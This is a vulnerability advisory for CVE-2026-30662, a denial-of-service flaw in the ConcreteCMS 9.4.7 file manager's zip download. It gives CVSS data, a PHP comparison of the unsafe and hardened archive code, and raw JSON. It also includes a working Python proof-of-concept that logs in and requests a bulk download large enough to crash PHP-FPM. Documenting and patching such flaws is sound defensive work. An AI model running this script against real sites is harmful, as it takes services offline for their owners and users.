Security Vulnerability Report

CVE-2026-30662

Published: 2026-03-24 15:16:34
Last Modified: 2026-03-24 20:16:27

Description

ConcreteCMS v9.4.7 contains a Denial of Service (DoS) vulnerability in the File Manager component. The 'download' method in 'concrete/controllers/backend/file.php' improperly manages memory when creating zip archives. It uses 'ZipArchive::addFromString' combined with 'file_get_contents', which loads the entire content of every selected file into PHP memory. An authenticated attacker can exploit this by requesting a bulk download of large files, triggering an Out-Of-Memory (OOM) condition that causes the PHP-FPM process to terminate (SIGSEGV) and the web server to return a 500 error.
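
The memory pattern named in the description, placed beside a streaming alternative, as an added illustration that is not ConcreteCMS code: the function names, the `$paths` list of already-resolved file paths and the `$maxTotalBytes` cap are hypothetical.

```php
<?php
// Added example, not code from concrete/controllers/backend/file.php.
// $paths is a hypothetical list of absolute paths resolved from the selected
// file IDs; $maxTotalBytes is a hypothetical per-request size budget.

// Pattern described in the advisory: each selected file is read completely
// into a PHP string before it is handed to the archive, so peak memory grows
// with the combined size of everything selected.
function buildZipUnsafe(array $paths, string $zipPath): void
{
    $zip = new ZipArchive();
    $zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE);
    foreach ($paths as $path) {
        $zip->addFromString(basename($path), file_get_contents($path));
    }
    $zip->close();
}

// Hardened form: addFile() gives libzip the path, and the bytes are read from
// disk when close() writes the archive instead of being buffered in PHP
// memory. A total-size budget is checked first so a single request cannot
// tie up unbounded disk space or request time either.
function buildZipSafe(array $paths, string $zipPath, int $maxTotalBytes): void
{
    $total = 0;
    foreach ($paths as $path) {
        $size = filesize($path);
        if ($size === false) {
            throw new RuntimeException("Cannot stat $path");
        }
        $total += $size;
        if ($total > $maxTotalBytes) {
            throw new RuntimeException(
                "Bulk download exceeds the $maxTotalBytes byte limit"
            );
        }
    }

    $zip = new ZipArchive();
    if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
        throw new RuntimeException("Cannot create $zipPath");
    }
    foreach ($paths as $path) {
        // Entry name is the basename only, so no stored path escapes the archive root.
        $zip->addFile($path, basename($path));
    }
    $zip->close();
}
```

The cap belongs in front of the archive step because once addFromString has been called the memory is already committed; the memory_limit setting is the last line of defence, not the fix.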

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:concretecms:concrete_cms:9.4.7:*:*:*:*:*:*:* - VULNERABLE
ConcreteCMS v9.4.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
# Exploit Title: ConcreteCMS v9.4.7 - DoS via File Manager Bulk Download
# Date: 2026-03-24
# Exploit Author: Analyst
# Vendor Homepage: https://www.concretecms.com/
# Version: 9.4.7

target_url = "http://target-site.com/index.php/concrete/backend/file/download"
session = requests.Session()

# 1. Login as a low-privileged user
login_payload = {
    "uName": "attacker",
    "uPassword": "password"
}
session.post("http://target-site.com/index.php/login/perform_login", data=login_payload)

# 2. Select a large list of file IDs to trigger OOM
# Assuming file IDs 1 to 100 are large files
exploit_payload = {
    "fIDs[]": list(range(1, 101)),
    "download": "Download Selected"
}

try:
    print("Sending malicious bulk download request...")
    response = session.post(target_url, data=exploit_payload)
    if response.status_code == 500:
        print("[+] Server returned 500 Error - Potential DoS successful")
    else:
        print(f"[-] Server responded with status: {response.status_code}")
except Exception as e:
    print(f"Request failed: {e}")

References

https://wang1rrr.github.io/2026/02/11/CVE-Report-ConcreteCMS-DoS/ (Exploit, Third Party Advisory)

Weakness: CWE-400
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-30662",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-24T15:16:34.457",
    "lastModified": "2026-03-24T20:16:27.010",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ConcreteCMS v9.4.7 contains a Denial of Service (DoS) vulnerability in the File Manager component. The 'download' method in 'concrete/controllers/backend/file.php' improperly manages memory when creating zip archives. It uses 'ZipArchive::addFromString' combined with 'file_get_contents', which loads the entire content of every selected file into PHP memory. An authenticated attacker can exploit this by requesting a bulk download of large files, triggering an Out-Of-Memory (OOM) condition that causes the PHP-FPM process to terminate (SIGSEGV) and the web server to return a 500 error."
      },
      {
        "lang": "es",
        "value": "ConcreteCMS v9.4.7 contiene una vulnerabilidad de denegación de servicio (DoS) en el componente del Administrador de Archivos. El método 'download' en 'concrete/controllers/backend/file.php' gestiona incorrectamente la memoria al crear archivos zip. Utiliza 'ZipArchive::addFromString' combinado con 'file_get_contents', lo que carga el contenido completo de cada archivo seleccionado en la memoria PHP. Un atacante autenticado puede explotar esto solicitando una descarga masiva de archivos grandes, lo que desencadena una condición de Out-Of-Memory (OOM) que provoca la terminación del proceso PHP-FPM (SIGSEGV) y que el servidor web devuelva un error 500."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        },
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-400"
          }
        ]
      },
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-400"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:concretecms:concrete_cms:9.4.7:*:*:*:*:*:*:*",
                "matchCriteriaId": "EF06110B-22B0-44D9-951B-BBB115E0968D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wang1rrr.github.io/2026/02/11/CVE-Report-ConcreteCMS-DoS/",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}